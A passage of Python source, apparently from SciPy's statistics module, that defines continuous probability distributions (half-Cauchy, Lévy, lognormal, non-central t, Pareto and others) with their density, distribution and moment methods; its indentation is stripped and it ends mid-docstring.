return np.log(2.0/pi) - special.log1p(x*x)
def _cdf(self, x):
return 2.0/pi*arctan(x)
def _ppf(self, q):
return tan(pi/2*q)
def _stats(self):
return inf, inf, nan, nan
def _entropy(self):
return log(2*pi)
halfcauchy = halfcauchy_gen(a=0.0, name='halfcauchy')
class halflogistic_gen(rv_continuous):
"""A half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halflogistic` is::
halflogistic.pdf(x) = 2 * exp(-x) / (1+exp(-x))**2 = 1/2 * sech(x/2)**2
for ``x >= 0``.
%(example)s
"""
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return log(2) - x - 2. * special.log1p(exp(-x))
def _cdf(self, x):
return tanh(x/2.0)
def _ppf(self, q):
return 2*arctanh(q)
def _munp(self, n):
if n == 1:
return 2*log(2)
if n == 2:
return pi*pi/3.0
if n == 3:
return 9*_ZETA3
if n == 4:
return 7*pi**4 / 15.0
return 2*(1-pow(2.0, 1-n))*special.gamma(n+1)*special.zeta(n, 1)
def _entropy(self):
return 2-log(2)
halflogistic = halflogistic_gen(a=0.0, name='halflogistic')
class halfnorm_gen(rv_continuous):
"""A half-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfnorm` is::
halfnorm.pdf(x) = sqrt(2/pi) * exp(-x**2/2)
for ``x > 0``.
`halfnorm` is a special case of `chi` with ``df == 1``.
%(example)s
"""
def _rvs(self):
return abs(self._random_state.standard_normal(size=self._size))
def _pdf(self, x):
return sqrt(2.0/pi)*exp(-x*x/2.0)
def _logpdf(self, x):
return 0.5 * np.log(2.0/pi) - x*x/2.0
def _cdf(self, x):
return special.ndtr(x)*2-1.0
def _ppf(self, q):
return special.ndtri((1+q)/2.0)
def _stats(self):
return (sqrt(2.0/pi), 1-2.0/pi, sqrt(2)*(4-pi)/(pi-2)**1.5,
8*(pi-3)/(pi-2)**2)
def _entropy(self):
return 0.5*log(pi/2.0)+0.5
halfnorm = halfnorm_gen(a=0.0, name='halfnorm')
class hypsecant_gen(rv_continuous):
"""A hyperbolic secant continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `hypsecant` is::
hypsecant.pdf(x) = 1/pi * sech(x)
%(example)s
"""
def _pdf(self, x):
return 1.0/(pi*cosh(x))
def _cdf(self, x):
return 2.0/pi*arctan(exp(x))
def _ppf(self, q):
return log(tan(pi*q/2.0))
def _stats(self):
return 0, pi*pi/4, 0, 2
def _entropy(self):
return log(2*pi)
hypsecant = hypsecant_gen(name='hypsecant')
class gausshyper_gen(rv_continuous):
"""A Gauss hypergeometric continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gausshyper` is::
gausshyper.pdf(x, a, b, c, z) =
C * x**(a-1) * (1-x)**(b-1) * (1+z*x)**(-c)
for ``0 <= x <= 1``, ``a > 0``, ``b > 0``, and
``C = 1 / (B(a, b) F[2, 1](c, a; a+b; -z))``
%(example)s
"""
def _argcheck(self, a, b, c, z):
return (a > 0) & (b > 0) & (c == c) & (z == z)
def _pdf(self, x, a, b, c, z):
Cinv = gam(a)*gam(b)/gam(a+b)*special.hyp2f1(c, a, a+b, -z)
return 1.0/Cinv * x**(a-1.0) * (1.0-x)**(b-1.0) / (1.0+z*x)**c
def _munp(self, n, a, b, c, z):
fac = special.beta(n+a, b) / special.beta(a, b)
num = special.hyp2f1(c, a+n, a+b+n, -z)
den = special.hyp2f1(c, a, a+b, -z)
return fac*num / den
gausshyper = gausshyper_gen(a=0.0, b=1.0, name='gausshyper')
class invgamma_gen(rv_continuous):
"""An inverted gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgamma` is::
invgamma.pdf(x, a) = x**(-a-1) / gamma(a) * exp(-1/x)
for x > 0, a > 0.
`invgamma` is a special case of `gengamma` with ``c == -1``.
%(example)s
"""
def _pdf(self, x, a):
return exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return (-(a+1) * log(x) - gamln(a) - 1.0/x)
def _cdf(self, x, a):
return 1.0 - special.gammainc(a, 1.0/x)
def _ppf(self, q, a):
return 1.0 / special.gammaincinv(a, 1.-q)
def _stats(self, a, moments='mvsk'):
m1 = _lazywhere(a > 1, (a,), lambda x: 1. / (x - 1.), np.inf)
m2 = _lazywhere(a > 2, (a,), lambda x: 1. / (x - 1.)**2 / (x - 2.),
np.inf)
g1, g2 = None, None
if 's' in moments:
g1 = _lazywhere(
a > 3, (a,),
lambda x: 4. * np.sqrt(x - 2.) / (x - 3.), np.nan)
if 'k' in moments:
g2 = _lazywhere(
a > 4, (a,),
lambda x: 6. * (5. * x - 11.) / (x - 3.) / (x - 4.), np.nan)
return m1, m2, g1, g2
def _entropy(self, a):
return a - (a+1.0) * special.psi(a) + gamln(a)
invgamma = invgamma_gen(a=0.0, name='invgamma')
# scale is gamma from DATAPLOT and B from Regress
class invgauss_gen(rv_continuous):
"""An inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgauss` is::
invgauss.pdf(x, mu) = 1 / sqrt(2*pi*x**3) * exp(-(x-mu)**2/(2*x*mu**2))
for ``x > 0``.
    When `mu` is too small, evaluating the cumulative distribution function
    will be inaccurate due to ``cdf(mu -> 0) = inf * 0``.
NaNs are returned for ``mu <= 0.0028``.
%(example)s
"""
def _rvs(self, mu):
return self._random_state.wald(mu, 1.0, size=self._size)
def _pdf(self, x, mu):
return 1.0/sqrt(2*pi*x**3.0)*exp(-1.0/(2*x)*((x-mu)/mu)**2)
def _logpdf(self, x, mu):
return -0.5*log(2*pi) - 1.5*log(x) - ((x-mu)/mu)**2/(2*x)
def _cdf(self, x, mu):
fac = sqrt(1.0/x)
# Numerical accuracy for small `mu` is bad. See #869.
C1 = _norm_cdf(fac*(x-mu)/mu)
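        # The exp(1.0/mu) factor below is applied twice rather than once
        # as exp(2.0/mu), presumably so the tiny normal CDF value is
        # interleaved between the two large exponentials, reducing the
        # chance of intermediate overflow for small mu.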
C1 += exp(1.0/mu) * _norm_cdf(-fac*(x+mu)/mu) * exp(1.0/mu)
return C1
def _stats(self, mu):
return mu, mu**3.0, 3*sqrt(mu), 15*mu
invgauss = invgauss_gen(a=0.0, name='invgauss')
class invweibull_gen(rv_continuous):
"""An inverted Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invweibull` is::
invweibull.pdf(x, c) = c * x**(-c-1) * exp(-x**(-c))
for ``x > 0``, ``c > 0``.
References
----------
F.R.S. de Gusmao, E.M.M Ortega and G.M. Cordeiro, "The generalized inverse
Weibull distribution", Stat. Papers, vol. 52, pp. 591-619, 2011.
%(example)s
"""
def _pdf(self, x, c):
xc1 = np.power(x, -c - 1.0)
xc2 = np.power(x, -c)
xc2 = exp(-xc2)
return c * xc1 * xc2
def _cdf(self, x, c):
xc1 = np.power(x, -c)
return exp(-xc1)
def _ppf(self, q, c):
return np.power(-log(q), -1.0/c)
def _munp(self, n, c):
return special.gamma(1 - n / c)
def _entropy(self, c):
return 1+_EULER + _EULER / c - log(c)
invweibull = invweibull_gen(a=0, name='invweibull')
class johnsonsb_gen(rv_continuous):
"""A Johnson SB continuous random variable.
%(before_notes)s
See Also
--------
johnsonsu
Notes
-----
The probability density function for `johnsonsb` is::
johnsonsb.pdf(x, a, b) = b / (x*(1-x)) * phi(a + b * log(x/(1-x)))
for ``0 < x < 1`` and ``a, b > 0``, and ``phi`` is the normal pdf.
%(example)s
"""
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
trm = _norm_pdf(a + b*log(x/(1.0-x)))
return b*1.0/(x*(1-x))*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b*log(x/(1.0-x)))
def _ppf(self, q, a, b):
return 1.0 / (1 + exp(-1.0 / b * (_norm_ppf(q) - a)))
johnsonsb = johnsonsb_gen(a=0.0, b=1.0, name='johnsonsb')
class johnsonsu_gen(rv_continuous):
"""A Johnson SU continuous random variable.
%(before_notes)s
See Also
--------
johnsonsb
Notes
-----
The probability density function for `johnsonsu` is::
johnsonsu.pdf(x, a, b) = b / sqrt(x**2 + 1) *
phi(a + b * log(x + sqrt(x**2 + 1)))
for all ``x, a, b > 0``, and `phi` is the normal pdf.
%(example)s
"""
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
x2 = x*x
trm = _norm_pdf(a + b * log(x + sqrt(x2+1)))
return b*1.0/sqrt(x2+1.0)*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b * log(x + sqrt(x*x + 1)))
def _ppf(self, q, a, b):
return sinh((_norm_ppf(q) - a) / b)
johnsonsu = johnsonsu_gen(name='johnsonsu')
class laplace_gen(rv_continuous):
"""A Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `laplace` is::
laplace.pdf(x) = 1/2 * exp(-abs(x))
%(example)s
"""
def _rvs(self):
return self._random_state.laplace(0, 1, size=self._size)
def _pdf(self, x):
return 0.5*exp(-abs(x))
def _cdf(self, x):
return where(x > 0, 1.0-0.5*exp(-x), 0.5*exp(x))
def _ppf(self, q):
return where(q > 0.5, -log(2*(1-q)), log(2*q))
def _stats(self):
return 0, 2, 0, 3
def _entropy(self):
return log(2)+1
laplace = laplace_gen(name='laplace')
class levy_gen(rv_continuous):
"""A Levy continuous random variable.
%(before_notes)s
See Also
--------
levy_stable, levy_l
Notes
-----
The probability density function for `levy` is::
levy.pdf(x) = 1 / (x * sqrt(2*pi*x)) * exp(-1/(2*x))
for ``x > 0``.
This is the same as the Levy-stable distribution with a=1/2 and b=1.
%(example)s
"""
def _pdf(self, x):
return 1 / sqrt(2*pi*x) / x * exp(-1/(2*x))
def _cdf(self, x):
# Equivalent to 2*norm.sf(sqrt(1/x))
return special.erfc(sqrt(0.5 / x))
def _ppf(self, q):
# Equivalent to 1.0/(norm.isf(q/2)**2) or 0.5/(erfcinv(q)**2)
val = -special.ndtri(q/2)
return 1.0 / (val * val)
def _stats(self):
return inf, inf, nan, nan
levy = levy_gen(a=0.0, name="levy")
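# A short consistency sketch (not part of the original module), matching
# the comment inside _cdf above.
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.levy.cdf(2.0), 2 * stats.norm.sf(np.sqrt(1 / 2.0)))
# True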
class levy_l_gen(rv_continuous):
"""A left-skewed Levy continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_stable
Notes
-----
The probability density function for `levy_l` is::
levy_l.pdf(x) = 1 / (abs(x) * sqrt(2*pi*abs(x))) * exp(-1/(2*abs(x)))
for ``x < 0``.
This is the same as the Levy-stable distribution with a=1/2 and b=-1.
%(example)s
"""
def _pdf(self, x):
ax = abs(x)
return 1/sqrt(2*pi*ax)/ax*exp(-1/(2*ax))
def _cdf(self, x):
ax = abs(x)
return 2 * _norm_cdf(1 / sqrt(ax)) - 1
def _ppf(self, q):
val = _norm_ppf((q + 1.0) / 2)
return -1.0 / (val * val)
def _stats(self):
return inf, inf, nan, nan
levy_l = levy_l_gen(b=0.0, name="levy_l")
class levy_stable_gen(rv_continuous):
"""A Levy-stable continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_l
Notes
-----
Levy-stable distribution (only random variates available -- ignore other
docs)
%(example)s
"""
def _rvs(self, alpha, beta):
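        # The sampler below follows the Chambers-Mallows-Stuck construction:
        # TH is uniform on (-pi/2, pi/2), W is an independent Exp(1) variate,
        # and alpha == 1 / beta == 0 are handled as the usual special cases.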
sz = self._size
TH = uniform.rvs(loc=-pi/2.0, scale=pi, size=sz)
W = expon.rvs(size=sz)
if alpha == 1:
return 2/pi*(pi/2+beta*TH)*tan(TH)-beta*log((pi/2*W*cos(TH))/(pi/2+beta*TH))
ialpha = 1.0/alpha
aTH = alpha*TH
if beta == 0:
return W/(cos(TH)/tan(aTH)+sin(TH))*((cos(aTH)+sin(aTH)*tan(TH))/W)**ialpha
val0 = beta*tan(pi*alpha/2)
th0 = arctan(val0)/alpha
val3 = W/(cos(TH)/tan(alpha*(th0+TH))+sin(TH))
res3 = val3*((cos(aTH)+sin(aTH)*tan(TH)-val0*(sin(aTH)-cos(aTH)*tan(TH)))/W)**ialpha
return res3
def _argcheck(self, alpha, beta):
if beta == -1:
self.b = 0.0
elif beta == 1:
self.a = 0.0
return (alpha > 0) & (alpha <= 2) & (beta <= 1) & (beta >= -1)
def _pdf(self, x, alpha, beta):
raise NotImplementedError
levy_stable = levy_stable_gen(name='levy_stable')
class logistic_gen(rv_continuous):
"""A logistic (or Sech-squared) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `logistic` is::
logistic.pdf(x) = exp(-x) / (1+exp(-x))**2
`logistic` is a special case of `genlogistic` with ``c == 1``.
%(example)s
"""
def _rvs(self):
return self._random_state.logistic(size=self._size)
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return -x - 2. * special.log1p(exp(-x))
def _cdf(self, x):
return special.expit(x)
def _ppf(self, q):
return -log(1.0/q-1)
def _stats(self):
return 0, pi*pi/3.0, 0, 6.0/5.0
def _entropy(self):
# http://en.wikipedia.org/wiki/Logistic_distribution
return 2.0
logistic = logistic_gen(name='logistic')
class loggamma_gen(rv_continuous):
"""A log gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loggamma` is::
loggamma.pdf(x, c) = exp(c*x-exp(x)) / gamma(c)
for all ``x, c > 0``.
%(example)s
"""
def _rvs(self, c):
return log(self._random_state.gamma(c, size=self._size))
def _pdf(self, x, c):
return exp(c*x-exp(x)-gamln(c))
def _cdf(self, x, c):
return special.gammainc(c, exp(x))
def _ppf(self, q, c):
return log(special.gammaincinv(c, q))
def _stats(self, c):
# See, for example, "A Statistical Study of Log-Gamma Distribution", by
# Ping Shing Chan (thesis, McMaster University, 1993).
mean = special.digamma(c)
var = special.polygamma(1, c)
skewness = special.polygamma(2, c) / np.power(var, 1.5)
excess_kurtosis = special.polygamma(3, c) / (var*var)
return mean, var, skewness, excess_kurtosis
loggamma = loggamma_gen(name='loggamma')
class loglaplace_gen(rv_continuous):
"""A log-Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `loglaplace` is::
loglaplace.pdf(x, c) = c / 2 * x**(c-1), for 0 < x < 1
= c / 2 * x**(-c-1), for x >= 1
for ``c > 0``.
References
----------
T.J. Kozubowski and K. Podgorski, "A log-Laplace growth rate model",
The Mathematical Scientist, vol. 28, pp. 49-60, 2003.
%(example)s
"""
def _pdf(self, x, c):
cd2 = c/2.0
c = where(x < 1, c, -c)
return cd2*x**(c-1)
def _cdf(self, x, c):
return where(x < 1, 0.5*x**c, 1-0.5*x**(-c))
def _ppf(self, q, c):
return where(q < 0.5, (2.0*q)**(1.0/c), (2*(1.0-q))**(-1.0/c))
def _munp(self, n, c):
return c**2 / (c**2 - n**2)
def _entropy(self, c):
return log(2.0/c) + 1.0
loglaplace = loglaplace_gen(a=0.0, name='loglaplace')
def _lognorm_logpdf(x, s):
return -log(x)**2 / (2*s**2) + np.where(x == 0, 0, -log(s*x*sqrt(2*pi)))
class lognorm_gen(rv_continuous):
"""A lognormal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `lognorm` is::
lognorm.pdf(x, s) = 1 / (s*x*sqrt(2*pi)) * exp(-1/2*(log(x)/s)**2)
for ``x > 0``, ``s > 0``.
    If ``log(x)`` is normally distributed with mean ``mu`` and variance
    ``sigma**2``, then ``x`` is log-normally distributed with shape parameter
    ``sigma`` and scale parameter ``exp(mu)``.
%(example)s
"""
def _rvs(self, s):
return exp(s * self._random_state.standard_normal(self._size))
def _pdf(self, x, s):
return exp(self._logpdf(x, s))
def _logpdf(self, x, s):
return _lognorm_logpdf(x, s)
def _cdf(self, x, s):
return _norm_cdf(log(x) / s)
def _ppf(self, q, s):
return exp(s * _norm_ppf(q))
def _stats(self, s):
p = exp(s*s)
mu = sqrt(p)
mu2 = p*(p-1)
g1 = sqrt((p-1))*(2+p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self, s):
return 0.5 * (1 + log(2*pi) + 2 * log(s))
lognorm = lognorm_gen(a=0.0, name='lognorm')
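# Illustrative note (not part of the original module): per the docstring, if
# log(x) ~ N(mu, sigma**2) then the matching frozen distribution is
# lognorm(s=sigma, scale=exp(mu)); the numbers below are hypothetical.
#
#     >>> mu, sigma = 1.0, 0.5                       # doctest: +SKIP
#     >>> frozen = lognorm(sigma, scale=np.exp(mu))  # doctest: +SKIP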
class gilbrat_gen(rv_continuous):
"""A Gilbrat continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gilbrat` is::
gilbrat.pdf(x) = 1/(x*sqrt(2*pi)) * exp(-1/2*(log(x))**2)
`gilbrat` is a special case of `lognorm` with ``s = 1``.
%(example)s
"""
def _rvs(self):
return exp(self._random_state.standard_normal(self._size))
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return _lognorm_logpdf(x, 1.0)
def _cdf(self, x):
return _norm_cdf(log(x))
def _ppf(self, q):
return exp(_norm_ppf(q))
def _stats(self):
p = np.e
mu = sqrt(p)
mu2 = p * (p - 1)
g1 = sqrt((p - 1)) * (2 + p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self):
return 0.5 * log(2 * pi) + 0.5
gilbrat = gilbrat_gen(a=0.0, name='gilbrat')
class maxwell_gen(rv_continuous):
"""A Maxwell continuous random variable.
%(before_notes)s
Notes
-----
A special case of a `chi` distribution, with ``df = 3``, ``loc = 0.0``,
and given ``scale = a``, where ``a`` is the parameter used in the
Mathworld description [1]_.
The probability density function for `maxwell` is::
        maxwell.pdf(x) = sqrt(2/pi) * x**2 * exp(-x**2/2)
for ``x > 0``.
References
----------
.. [1] http://mathworld.wolfram.com/MaxwellDistribution.html
%(example)s
"""
def _rvs(self):
return chi.rvs(3.0, size=self._size, random_state=self._random_state)
def _pdf(self, x):
return sqrt(2.0/pi)*x*x*exp(-x*x/2.0)
def _cdf(self, x):
return special.gammainc(1.5, x*x/2.0)
def _ppf(self, q):
return sqrt(2*special.gammaincinv(1.5, q))
def _stats(self):
val = 3*pi-8
return (2*sqrt(2.0/pi), 3-8/pi, sqrt(2)*(32-10*pi)/val**1.5,
(-12*pi*pi + 160*pi - 384) / val**2.0)
def _entropy(self):
return _EULER + 0.5*log(2*pi)-0.5
maxwell = maxwell_gen(a=0.0, name='maxwell')
class mielke_gen(rv_continuous):
"""A Mielke's Beta-Kappa continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `mielke` is::
mielke.pdf(x, k, s) = k * x**(k-1) / (1+x**s)**(1+k/s)
for ``x > 0``.
%(example)s
"""
def _pdf(self, x, k, s):
return k*x**(k-1.0) / (1.0+x**s)**(1.0+k*1.0/s)
def _cdf(self, x, k, s):
return x**k / (1.0+x**s)**(k*1.0/s)
def _ppf(self, q, k, s):
qsk = pow(q, s*1.0/k)
return pow(qsk/(1.0-qsk), 1.0/s)
mielke = mielke_gen(a=0.0, name='mielke')
class nakagami_gen(rv_continuous):
"""A Nakagami continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `nakagami` is::
nakagami.pdf(x, nu) = 2 * nu**nu / gamma(nu) *
x**(2*nu-1) * exp(-nu*x**2)
for ``x > 0``, ``nu > 0``.
%(example)s
"""
def _pdf(self, x, nu):
return 2*nu**nu/gam(nu)*(x**(2*nu-1.0))*exp(-nu*x*x)
def _cdf(self, x, nu):
return special.gammainc(nu, nu*x*x)
def _ppf(self, q, nu):
return sqrt(1.0/nu*special.gammaincinv(nu, q))
def _stats(self, nu):
mu = gam(nu+0.5)/gam(nu)/sqrt(nu)
mu2 = 1.0-mu*mu
g1 = mu * (1 - 4*nu*mu2) / 2.0 / nu / np.power(mu2, 1.5)
g2 = -6*mu**4*nu + (8*nu-2)*mu**2-2*nu + 1
g2 /= nu*mu2**2.0
return mu, mu2, g1, g2
nakagami = nakagami_gen(a=0.0, name="nakagami")
class ncx2_gen(rv_continuous):
"""A non-central chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncx2` is::
ncx2.pdf(x, df, nc) = exp(-(nc+x)/2) * 1/2 * (x/nc)**((df-2)/4)
* I[(df-2)/2](sqrt(nc*x))
for ``x > 0``.
%(example)s
"""
def _rvs(self, df, nc):
return self._random_state.noncentral_chisquare(df, nc, self._size)
def _logpdf(self, x, df, nc):
return _ncx2_log_pdf(x, df, nc)
def _pdf(self, x, df, nc):
return _ncx2_pdf(x, df, nc)
def _cdf(self, x, df, nc):
return _ncx2_cdf(x, df, nc)
def _ppf(self, q, df, nc):
return special.chndtrix(q, df, nc)
def _stats(self, df, nc):
val = df + 2.0*nc
return (df + nc, 2*val, sqrt(8)*(val+nc)/val**1.5,
12.0*(val+2*nc)/val**2.0)
ncx2 = ncx2_gen(a=0.0, name='ncx2')
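# Sanity check (illustrative, not part of the original module): for df=2 and
# nc=3 the _stats formulas above give mean = df + nc = 5 and
# variance = 2*(df + 2*nc) = 16.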
class ncf_gen(rv_continuous):
"""A non-central F distribution continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncf` is::
        ncf.pdf(x, df1, df2, nc) = exp(-nc/2 + nc*df1*x/(2*(df1*x+df2))) *
                    df1**(df1/2) * df2**(df2/2) * x**(df1/2-1) *
                    (df2+df1*x)**(-(df1+df2)/2) *
                    gamma(df1/2)*gamma(1+df2/2) *
                    L^{df1/2-1}_{df2/2}(-nc*df1*x/(2*(df1*x+df2))) /
                    (B(df1/2, df2/2) * gamma((df1+df2)/2))
for ``df1, df2, nc > 0``.
%(example)s
"""
def _rvs(self, dfn, dfd, nc):
return self._random_state.noncentral_f(dfn, dfd, nc, self._size)
def _pdf_skip(self, x, dfn, dfd, nc):
n1, n2 = dfn, dfd
term = -nc/2+nc*n1*x/(2*(n2+n1*x)) + gamln(n1/2.)+gamln(1+n2/2.)
term -= gamln((n1+n2)/2.0)
Px = exp(term)
Px *= n1**(n1/2) * n2**(n2/2) * x**(n1/2-1)
Px *= (n2+n1*x)**(-(n1+n2)/2)
Px *= special.assoc_laguerre(-nc*n1*x/(2.0*(n2+n1*x)), n2/2, n1/2-1)
Px /= special.beta(n1/2, n2/2)
# This function does not have a return. Drop it for now, the generic
# function seems to work OK.
def _cdf(self, x, dfn, dfd, nc):
return special.ncfdtr(dfn, dfd, nc, x)
def _ppf(self, q, dfn, dfd, nc):
return special.ncfdtri(dfn, dfd, nc, q)
def _munp(self, n, dfn, dfd, nc):
val = (dfn * 1.0/dfd)**n
term = gamln(n+0.5*dfn) + gamln(0.5*dfd-n) - gamln(dfd*0.5)
val *= exp(-nc / 2.0+term)
val *= special.hyp1f1(n+0.5*dfn, 0.5*dfn, 0.5*nc)
return val
def _stats(self, dfn, dfd, nc):
mu = where(dfd <= 2, inf, dfd / (dfd-2.0)*(1+nc*1.0/dfn))
mu2 = where(dfd <= 4, inf, 2*(dfd*1.0/dfn)**2.0 *
((dfn+nc/2.0)**2.0 + (dfn+nc)*(dfd-2.0)) /
((dfd-2.0)**2.0 * (dfd-4.0)))
return mu, mu2, None, None
ncf = ncf_gen(a=0.0, name='ncf')
class t_gen(rv_continuous):
"""A Student's T continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `t` is::
        t.pdf(x, df) = gamma((df+1)/2) /
                       (sqrt(pi*df) * gamma(df/2) * (1+x**2/df)**((df+1)/2))
for ``df > 0``.
%(example)s
"""
def _rvs(self, df):
return self._random_state.standard_t(df, size=self._size)
def _pdf(self, x, df):
r = asarray(df*1.0)
Px = exp(gamln((r+1)/2)-gamln(r/2))
Px /= sqrt(r*pi)*(1+(x**2)/r)**((r+1)/2)
return Px
def _logpdf(self, x, df):
r = df*1.0
lPx = gamln((r+1)/2)-gamln(r/2)
lPx -= 0.5*log(r*pi) + (r+1)/2*log(1+(x**2)/r)
return lPx
def _cdf(self, x, df):
return special.stdtr(df, x)
def _sf(self, x, df):
return special.stdtr(df, -x)
def _ppf(self, q, df):
return special.stdtrit(df, q)
def _isf(self, q, df):
return -special.stdtrit(df, q)
def _stats(self, df):
mu2 = where(df > 2, df / (df-2.0), inf)
g1 = where(df > 3, 0.0, nan)
g2 = where(df > 4, 6.0/(df-4.0), nan)
return 0, mu2, g1, g2
t = t_gen(name='t')
class nct_gen(rv_continuous):
"""A non-central Student's T continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `nct` is::
        nct.pdf(x, df, nc) = df**(df/2) * gamma(df+1) /
                             (2**df * exp(nc**2/2) * (df+x**2)**(df/2) * gamma(df/2))
for ``df > 0``.
%(example)s
"""
def _argcheck(self, df, nc):
return (df > 0) & (nc == nc)
def _rvs(self, df, nc):
sz, rndm = self._size, self._random_state
n = norm.rvs(loc=nc, size=sz, random_state=rndm)
c2 = chi2.rvs(df, size=sz, random_state=rndm)
return n * sqrt(df) / sqrt(c2)
def _pdf(self, x, df, nc):
n = df*1.0
nc = nc*1.0
x2 = x*x
ncx2 = nc*nc*x2
fac1 = n + x2
trm1 = n/2.*log(n) + gamln(n+1)
trm1 -= n*log(2)+nc*nc/2.+(n/2.)*log(fac1)+gamln(n/2.)
Px = exp(trm1)
valF = ncx2 / (2*fac1)
trm1 = sqrt(2)*nc*x*special.hyp1f1(n/2+1, 1.5, valF)
trm1 /= asarray(fac1*special.gamma((n+1)/2))
trm2 = special.hyp1f1((n+1)/2, 0.5, valF)
trm2 /= asarray(sqrt(fac1)*special.gamma(n/2+1))
Px *= trm1+trm2
return Px
def _cdf(self, x, df, nc):
return special.nctdtr(df, nc, x)
def _ppf(self, q, df, nc):
return special.nctdtrit(df, nc, q)
def _stats(self, df, nc, moments='mv'):
#
# See D. Hogben, R.S. Pinkham, and M.B. Wilk,
# 'The moments of the non-central t-distribution'
        # Biometrika 48, p. 465 (1961).
# e.g. http://www.jstor.org/stable/2332772 (gated)
#
mu, mu2, g1, g2 = None, None, None, None
gfac = gam(df/2.-0.5) / gam(df/2.)
c11 = sqrt(df/2.) * gfac
c20 = df / (df-2.)
c22 = c20 - c11*c11
mu = np.where(df > 1, nc*c11, np.inf)
mu2 = np.where(df > 2, c22*nc*nc + c20, np.inf)
if 's' in moments:
c33t = df * (7.-2.*df) / (df-2.) / (df-3.) + 2.*c11*c11
c31t = 3.*df / (df-2.) / (df-3.)
mu3 = (c33t*nc*nc + c31t) * c11*nc
g1 = np.where(df > 3, mu3 / np.power(mu2, 1.5), np.nan)
#kurtosis
if 'k' in moments:
c44 = df*df / (df-2.) / (df-4.)
c44 -= c11*c11 * 2.*df*(5.-df) / (df-2.) / (df-3.)
c44 -= 3.*c11**4
c42 = df / (df-4.) - c11*c11 * (df-1.) / (df-3.)
c42 *= 6.*df / (df-2.)
c40 = 3.*df*df / (df-2.) / (df-4.)
mu4 = c44 * nc**4 + c42*nc**2 + c40
g2 = np.where(df > 4, mu4/mu2**2 - 3., np.nan)
return mu, mu2, g1, g2
nct = nct_gen(name="nct")
class pareto_gen(rv_continuous):
"""A Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pareto` is::
pareto.pdf(x, b) = b / x**(b+1)
for ``x >= 1``, ``b > 0``.
%(example)s
"""
def _pdf(self, x, b):
return b * x**(-b-1)
def _cdf(self, x, b):
return 1 - x**(-b)
def _ppf(self, q, b):
return pow(1-q, -1.0/b)
def _stats(self, b, moments='mv'):
mu, mu2, g1, g2 = None, None, None, None
if 'm' in moments:
mask = b > 1
bt = extract(mask, b)
mu = valarray(shape(b), value=inf)
place(mu, mask, bt / (bt-1.0))
if 'v' in moments:
mask = b > 2
bt = extract(mask, b)
mu2 = valarray(shape(b), value=inf)
place(mu2, mask, bt / (bt-2.0) / (bt-1.0)**2)
if 's' in moments:
mask = b > 3
bt = extract(mask, b)
g1 = valarray(shape(b), value=nan)
vals = 2 * (bt + 1.0) * sqrt(bt - 2.0) / ((bt - 3.0) * sqrt(bt))
place(g1, mask, vals)
if 'k' in moments:
mask = b > 4
bt = extract(mask, b)
g2 = valarray(shape(b), value=nan)
vals = (6.0*polyval([1.0, 1.0, -6, -2], bt) /
polyval([1.0, -7.0, 12.0, 0.0], bt))
place(g2, mask, vals)
return mu, mu2, g1, g2
def _entropy(self, c):
return 1 + 1.0/c - log(c)
pareto = pareto_gen(a=1.0, name="pareto")
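# Illustrative note (not part of the original module): the masks in _stats
# encode that the n-th moment is finite only for b > n, e.g.
#
#     >>> pareto.stats(0.5, moments='mv')  # doctest: +SKIP
#     (inf, inf)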
class lomax_gen(rv_continuous):
"""A Lomax (Pareto of the second kind) continuous random variable.
%(before_notes)s
Notes
-----
The Lomax distribution is a special case of the Pareto distribution, with
(loc=-1.0).
The probability density function for `lomax` is::
lomax.pdf(x, c) = c / (1+x)**(c+1)
for ``x >= 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return c*1.0/(1.0+x)**(c+1.0)
def _logpdf(self, x, c):
return log(c) - (c+1)*log(1+x)
def _cdf(self, x, c):
return 1.0-1.0/(1.0+x)**c
def _sf(self, x, c):
return 1.0/(1.0+x)**c
def _logsf(self, x, c):
return -c*log(1+x)
def _ppf(self, q, c):
return pow(1.0-q, -1.0/c)-1
def _stats(self, c):
mu, mu2, g1, g2 = pareto.stats(c, loc=-1.0, moments='mvsk')
return mu, mu2, g1, g2
def _entropy(self, c):
return 1+1.0/c-log(c)
lomax = lomax_gen(a=0.0, name="lomax")
class pearson3_gen(rv_continuous):
"""A pearson type III continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pearson3` is::
pearson3.pdf(x, skew) = abs(beta) / gamma(alpha) *
(beta * (x - zeta))**(alpha - 1) * exp(-beta*(x - zeta))
where::
beta = 2 / (skew * stddev)
alpha = (stddev * beta)**2
zeta = loc - alpha / beta
%(example)s
References
----------
